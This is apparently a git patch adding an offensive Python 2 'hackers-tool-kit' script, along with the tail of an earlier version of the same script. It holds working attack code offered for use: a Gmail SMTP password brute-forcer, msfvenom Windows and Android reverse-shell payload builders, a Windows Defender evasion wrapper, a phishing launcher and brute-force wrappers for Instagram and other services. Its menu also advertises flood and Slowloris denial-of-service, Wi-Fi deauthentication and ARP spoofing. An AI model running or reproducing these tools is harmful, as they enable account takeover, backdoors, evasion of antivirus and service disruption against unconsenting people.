hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From b3adec8c7f574a45fe4b260fb324fd4eefa0b54c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 19 Apr 2019 10:36:50 -0500 Subject: [PATCH 093/214] Add files via upload --- htk.py | 2543 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2543 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..435526b --- /dev/null +++ b/htk.py @@ -0,0 +1,2543 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} 